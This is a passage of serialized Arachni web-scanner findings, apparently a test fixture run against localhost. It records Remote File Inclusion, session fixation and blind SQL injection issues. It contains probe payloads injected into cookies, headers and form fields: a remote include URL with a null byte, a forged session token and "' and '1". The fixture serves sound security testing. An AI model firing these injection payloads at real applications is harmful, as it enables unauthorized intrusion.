V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMjoyNjoxNiBHTVQ=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MzM=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Remote File Inclusion
description: ! "The web application can be forced to include\n 3rd party remote
content which can often lead to arbitrary code\n execution, amongst other
attacks."
tags:
- remote
- file
- inclusion
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "Enforce strict validation and filtering\n on
user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_include
mod_name: Remote File Inclusion
variations: []
internal_modname: RFI
internal_modname: RFI
- !ruby/object:Arachni::Issue
verification: false
references:
WASC: http://projects.webappsec.org/Remote-File-Inclusion
Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
var: cookie2
url: http://localhost:5571/cookie/append
elem: cookie
method: GET
name: Remote File Inclusion
description: ! "The web application can be forced to include\n 3rd party remote
content which can often lead to arbitrary code\n execution, amongst other attacks."
tags:
- remote
- file
- inclusion
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "Enforce strict validation and filtering\n on
user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_include
mod_name: Remote File Inclusion
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WASC: http://projects.webappsec.org/Remote-File-Inclusion
Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
opts:
:redundant: false
:async: true
:regexp: 705cd559b16e6946826207c2199bd890
:match: 705cd559b16e6946826207c2199bd890
:substring: 705cd559b16e6946826207c2199bd890
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:follow_location: false
:injected_orig: hTtP://arachni.github.com/arachni/rfi.md5.txt
:altered: !binary |-
Y29va2llMg==
:element: cookie
:params: {}
:cookies:
!binary "Y29va2llMg==": !binary |-
Y29va2llIHZhbHVlaFR0UDovL2FyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5p
L3JmaS5tZDUudHh0AA==
:injected: !binary |-
Y29va2llIHZhbHVlaFR0UDovL2FyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5p
L3JmaS5tZDUudHh0AA==
:combo:
!binary "Y29va2llMg==": !binary |-
Y29va2llIHZhbHVlaFR0UDovL2FyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5p
L3JmaS5tZDUudHh0AA==
:action: http://localhost:5571/cookie/append
:verification: false
:id: 705cd559b16e6946826207c2199bd890
var: cookie2
url: http://localhost:5571/cookie/append
injected: !binary |-
Y29va2llIHZhbHVlaFR0UDovL2FyYWNobmkuZ2l0aHViLmNvbS9hcmFjaG5p
L3JmaS5tZDUudHh0AA==
id: 705cd559b16e6946826207c2199bd890
regexp: 705cd559b16e6946826207c2199bd890
regexp_match: 705cd559b16e6946826207c2199bd890
elem: cookie
remarks:
:stuff:
- Blah
- Blah2
method: GET
response: ! '705cd559b16e6946826207c2199bd890
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+valuehTtP://arachni.github.com/arachni/rfi.md5.txt%00;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMjoyNjozMyBHTVQ=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MzM=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Remote File Inclusion
description: ! "The web application can be forced to include\n 3rd party remote
content which can often lead to arbitrary code\n execution, amongst other
attacks."
tags:
- remote
- file
- inclusion
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "Enforce strict validation and filtering\n on
user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_include
mod_name: Remote File Inclusion
variations: []
internal_modname: RFI
internal_modname: RFI
- !ruby/object:Arachni::Issue
verification: false
references:
WASC: http://projects.webappsec.org/Remote-File-Inclusion
Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
var: cookie
url: http://localhost:5571/cookie/straight
elem: cookie
method: GET
name: Remote File Inclusion
description: ! "The web application can be forced to include\n 3rd party remote
content which can often lead to arbitrary code\n execution, amongst other attacks."
tags:
- remote
- file
- inclusion
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "Enforce strict validation and filtering\n on
user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_include
mod_name: Remote File Inclusion
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WASC: http://projects.webappsec.org/Remote-File-Inclusion
Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
opts:
:redundant: false
:async: true
:regexp: 705cd559b16e6946826207c2199bd890
:match: 705cd559b16e6946826207c2199bd890
:substring: 705cd559b16e6946826207c2199bd890
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:follow_location: false
:injected_orig: arachni.github.com/arachni/rfi.md5.txt
:altered: !binary |-
Y29va2ll
:element: cookie
:params: {}
:cookies:
!binary "Y29va2ll": !binary |-
YXJhY2huaS5naXRodWIuY29tL2FyYWNobmkvcmZpLm1kNS50eHQA
:injected: !binary |-
YXJhY2huaS5naXRodWIuY29tL2FyYWNobmkvcmZpLm1kNS50eHQA
:combo:
!binary "Y29va2ll": !binary |-
YXJhY2huaS5naXRodWIuY29tL2FyYWNobmkvcmZpLm1kNS50eHQA
:action: http://localhost:5571/cookie/straight
:verification: false
:id: 705cd559b16e6946826207c2199bd890
var: cookie
url: http://localhost:5571/cookie/straight
injected: !binary |-
YXJhY2huaS5naXRodWIuY29tL2FyYWNobmkvcmZpLm1kNS50eHQA
id: 705cd559b16e6946826207c2199bd890
regexp: 705cd559b16e6946826207c2199bd890
regexp_match: 705cd559b16e6946826207c2199bd890
elem: cookie
remarks: {}
method: GET
response: ! '705cd559b16e6946826207c2199bd890
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=arachni.github.com/arachni/rfi.md5.txt%00
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMjoyNjo0MSBHTVQ=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MzM=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Remote File Inclusion
description: ! "The web application can be forced to include\n 3rd party remote
content which can often lead to arbitrary code\n execution, amongst other
attacks."
tags:
- remote
- file
- inclusion
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "Enforce strict validation and filtering\n on
user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_include
mod_name: Remote File Inclusion
variations: []
internal_modname: RFI
internal_modname: RFI
- !ruby/object:Arachni::Issue
verification: false
references:
WASC: http://projects.webappsec.org/Remote-File-Inclusion
Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
var: User-Agent
url: http://localhost:5571/header/append
elem: header
method: GET
name: Remote File Inclusion
description: ! "The web application can be forced to include\n 3rd party remote
content which can often lead to arbitrary code\n execution, amongst other attacks."
tags:
- remote
- file
- inclusion
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "Enforce strict validation and filtering\n on
user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_include
mod_name: Remote File Inclusion
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WASC: http://projects.webappsec.org/Remote-File-Inclusion
Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
opts:
:redundant: false
:async: true
:regexp: 705cd559b16e6946826207c2199bd890
:match: 705cd559b16e6946826207c2199bd890
:substring: 705cd559b16e6946826207c2199bd890
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:follow_location: false
:injected_orig: arachni.github.com/arachni/rfi.md5.txt
:altered: User-Agent
:element: header
:params:
:headers:
User-Agent: arachni_userarachni.github.com/arachni/rfi.md5.txt
:injected: arachni_userarachni.github.com/arachni/rfi.md5.txt
:combo:
User-Agent: arachni_userarachni.github.com/arachni/rfi.md5.txt
:action: http://localhost:5571/header/append
:verification: false
:id: 705cd559b16e6946826207c2199bd890
var: User-Agent
url: http://localhost:5571/header/append
injected: arachni_userarachni.github.com/arachni/rfi.md5.txt
id: 705cd559b16e6946826207c2199bd890
regexp: 705cd559b16e6946826207c2199bd890
regexp_match: 705cd559b16e6946826207c2199bd890
elem: header
remarks: {}
method: GET
response: ! '705cd559b16e6946826207c2199bd890
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: arachni_userarachni.github.com/arachni/rfi.md5.txt
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMjoyNzowMCBHTVQ=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MzM=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Remote File Inclusion
description: ! "The web application can be forced to include\n 3rd party remote
content which can often lead to arbitrary code\n execution, amongst other
attacks."
tags:
- remote
- file
- inclusion
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "Enforce strict validation and filtering\n on
user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_include
mod_name: Remote File Inclusion
variations: []
internal_modname: RFI
internal_modname: RFI
- !ruby/object:Arachni::Issue
verification: true
references:
WASC: http://projects.webappsec.org/Remote-File-Inclusion
Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
var: User-Agent
url: http://localhost:5571/header/straight
elem: header
method: GET
name: Remote File Inclusion
description: ! "The web application can be forced to include\n 3rd party remote
content which can often lead to arbitrary code\n execution, amongst other attacks."
tags:
- remote
- file
- inclusion
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "Enforce strict validation and filtering\n on
user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_include
mod_name: Remote File Inclusion
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
WASC: http://projects.webappsec.org/Remote-File-Inclusion
Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion
opts:
:redundant: false
:async: true
:regexp: 705cd559b16e6946826207c2199bd890
:match: 705cd559b16e6946826207c2199bd890
:substring: 705cd559b16e6946826207c2199bd890
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:follow_location: false
:injected_orig: hTtP://arachni.github.com/arachni/rfi.md5.txt
:altered: User-Agent
:element: header
:params:
:headers:
User-Agent: hTtP://arachni.github.com/arachni/rfi.md5.txt
:injected: hTtP://arachni.github.com/arachni/rfi.md5.txt
:combo:
User-Agent: hTtP://arachni.github.com/arachni/rfi.md5.txt
:action: http://localhost:5571/header/straight
:verification: false
:id: 705cd559b16e6946826207c2199bd890
var: User-Agent
url: http://localhost:5571/header/straight
injected: hTtP://arachni.github.com/arachni/rfi.md5.txt
id: 705cd559b16e6946826207c2199bd890
regexp: 705cd559b16e6946826207c2199bd890
regexp_match: 705cd559b16e6946826207c2199bd890
elem: header
remarks: {}
method: GET
response: ! '705cd559b16e6946826207c2199bd890
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: hTtP://arachni.github.com/arachni/rfi.md5.txt
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMjoyNzoxMSBHTVQ=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MzM=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Remote File Inclusion
description: ! "The web application can be forced to include\n 3rd party remote
content which can often lead to arbitrary code\n execution, amongst other
attacks."
tags:
- remote
- file
- inclusion
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "Enforce strict validation and filtering\n on
user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_include
mod_name: Remote File Inclusion
variations: []
internal_modname: RFI
internal_modname: RFI
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP - Session fixation: hhttps://www.owasp.org/index.php/Session_fixation
var: input
url: http://localhost:12180/form/straight
elem: form
method: GET
name: Session fixation
description: The web application allows the session ID to be fixed by a 3rd party.
tags:
- session
- cookie
- injection
- fixation
- hijacking
cwe: '384'
cwe_url: http://cwe.mitre.org/data/definitions/384.html
severity: High
mod_name: Session fixation
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP - Session fixation: hhttps://www.owasp.org/index.php/Session_fixation
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:injected_orig: _arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": !binary |-
X2FyYWNobmlfc2ZfOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1
Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OQA=
:follow_location: true
:injected: !binary |-
X2FyYWNobmlfc2ZfOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1
Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OQA=
:combo:
!binary "aW5wdXQ=": !binary |-
X2FyYWNobmlfc2ZfOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1
Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OQA=
:action: http://localhost:12180/form/straight
:regexp: ''
var: input
url: http://localhost:12180/form/straight
injected: !binary |-
X2FyYWNobmlfc2ZfOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1
Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OQA=
id:
regexp: ''
regexp_match:
elem: form
remarks: {}
method: GET
response: !binary |-
X2FyYWNobmlfc2ZfOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1
Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OQA=
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: blah=blah1;blah2=blah2;session=blah
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nzc=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMjoyNzoxNyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
!binary "U2V0LUNvb2tpZQ==": !binary |-
c2Vzc2lvbj1fYXJhY2huaV9zZl85NWY5ZjhmMDhmNmYzNzkyNDJkN2FkYTg2
Y2FlMTk2ODVjYTM4ZTVmM2U0MjI4ZDdiY2QyNDU3NThkNWI5YzU5JTAwOyBk
b21haW49bG9jYWxob3N0OyBwYXRoPS87IEh0dHBPbmx5
name: Session fixation
description: The web application allows the session ID to be fixed by a 3rd party.
tags:
- session
- cookie
- injection
- fixation
- hijacking
cwe: '384'
cwe_url: http://cwe.mitre.org/data/definitions/384.html
severity: High
mod_name: Session fixation
variations: []
internal_modname: SessionFixation
internal_modname: SessionFixation
- !ruby/object:Arachni::Issue
verification: true
references:
OWASP - Session fixation: hhttps://www.owasp.org/index.php/Session_fixation
var: input
url: http://localhost:12180/form/append
elem: form
method: GET
name: Session fixation
description: The web application allows the session ID to be fixed by a 3rd party.
tags:
- session
- cookie
- injection
- fixation
- hijacking
cwe: '384'
cwe_url: http://cwe.mitre.org/data/definitions/384.html
severity: High
mod_name: Session fixation
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
OWASP - Session fixation: hhttps://www.owasp.org/index.php/Session_fixation
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:injected_orig: _arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": default_arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
:follow_location: true
:injected: default_arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
:combo:
!binary "aW5wdXQ=": default_arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
:action: http://localhost:12180/form/append
:regexp: ''
var: input
url: http://localhost:12180/form/append
injected: default_arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
id:
regexp: ''
regexp_match:
elem: form
remarks: {}
method: GET
response: _arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: blah=blah1;blah2=blah2;session=blah
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NzY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMjoyNzoxNyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
!binary "U2V0LUNvb2tpZQ==": !binary |-
c2Vzc2lvbj1fYXJhY2huaV9zZl85NWY5ZjhmMDhmNmYzNzkyNDJkN2FkYTg2
Y2FlMTk2ODVjYTM4ZTVmM2U0MjI4ZDdiY2QyNDU3NThkNWI5YzU5OyBkb21h
aW49bG9jYWxob3N0OyBwYXRoPS87IEh0dHBPbmx5
name: Session fixation
description: The web application allows the session ID to be fixed by a 3rd party.
tags:
- session
- cookie
- injection
- fixation
- hijacking
cwe: '384'
cwe_url: http://cwe.mitre.org/data/definitions/384.html
severity: High
mod_name: Session fixation
variations: []
internal_modname: SessionFixation
internal_modname: SessionFixation
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP - Session fixation: hhttps://www.owasp.org/index.php/Session_fixation
var: input
url: http://localhost:12180/link/straight?input=default
elem: link
method: GET
name: Session fixation
description: The web application allows the session ID to be fixed by a 3rd party.
tags:
- session
- cookie
- injection
- fixation
- hijacking
cwe: '384'
cwe_url: http://cwe.mitre.org/data/definitions/384.html
severity: High
mod_name: Session fixation
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP - Session fixation: hhttps://www.owasp.org/index.php/Session_fixation
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:injected_orig: _arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": _arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
:follow_location: true
:injected: _arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
:combo:
!binary "aW5wdXQ=": _arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
:action: http://localhost:12180/link/straight?input=default
:regexp: ''
var: input
url: http://localhost:12180/link/straight?input=default
injected: _arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
id:
regexp: ''
regexp_match:
elem: link
remarks:
:stuff:
- Blah
- Blah2
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: blah=blah1;blah2=blah2;session=blah
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMjoyNzoxOCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
!binary "U2V0LUNvb2tpZQ==": !binary |-
c2Vzc2lvbj1fYXJhY2huaV9zZl85NWY5ZjhmMDhmNmYzNzkyNDJkN2FkYTg2
Y2FlMTk2ODVjYTM4ZTVmM2U0MjI4ZDdiY2QyNDU3NThkNWI5YzU5OyBkb21h
aW49bG9jYWxob3N0OyBwYXRoPS87IEh0dHBPbmx5
name: Session fixation
description: The web application allows the session ID to be fixed by a 3rd party.
tags:
- session
- cookie
- injection
- fixation
- hijacking
cwe: '384'
cwe_url: http://cwe.mitre.org/data/definitions/384.html
severity: High
mod_name: Session fixation
variations: []
internal_modname: SessionFixation
internal_modname: SessionFixation
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP - Session fixation: hhttps://www.owasp.org/index.php/Session_fixation
var: input
url: http://localhost:12180/link/append?input=default
elem: link
method: GET
name: Session fixation
description: The web application allows the session ID to be fixed by a 3rd party.
tags:
- session
- cookie
- injection
- fixation
- hijacking
cwe: '384'
cwe_url: http://cwe.mitre.org/data/definitions/384.html
severity: High
mod_name: Session fixation
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP - Session fixation: hhttps://www.owasp.org/index.php/Session_fixation
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:injected_orig: _arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": default_arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
:follow_location: true
:injected: default_arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
:combo:
!binary "aW5wdXQ=": default_arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
:action: http://localhost:12180/link/append?input=default
:regexp: ''
var: input
url: http://localhost:12180/link/append?input=default
injected: default_arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
id:
regexp: ''
regexp_match:
elem: link
remarks: {}
method: GET
response: _arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: blah=blah1;blah2=blah2;session=blah
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NzY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMjoyNzoxOCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
!binary "U2V0LUNvb2tpZQ==": !binary |-
c2Vzc2lvbj1fYXJhY2huaV9zZl85NWY5ZjhmMDhmNmYzNzkyNDJkN2FkYTg2
Y2FlMTk2ODVjYTM4ZTVmM2U0MjI4ZDdiY2QyNDU3NThkNWI5YzU5OyBkb21h
aW49bG9jYWxob3N0OyBwYXRoPS87IEh0dHBPbmx5
name: Session fixation
description: The web application allows the session ID to be fixed by a 3rd party.
tags:
- session
- cookie
- injection
- fixation
- hijacking
cwe: '384'
cwe_url: http://cwe.mitre.org/data/definitions/384.html
severity: High
mod_name: Session fixation
variations: []
internal_modname: SessionFixation
internal_modname: SessionFixation
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
var: input
url: http://localhost:11824/form/append?input=default'+and+'1
elem: form
method: GET
name: Blind SQL Injection (differential analysis)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages."
tags:
- sql
- blind
- rdiff
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL Injection (differential analysis)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
opts:
:var: !binary |-
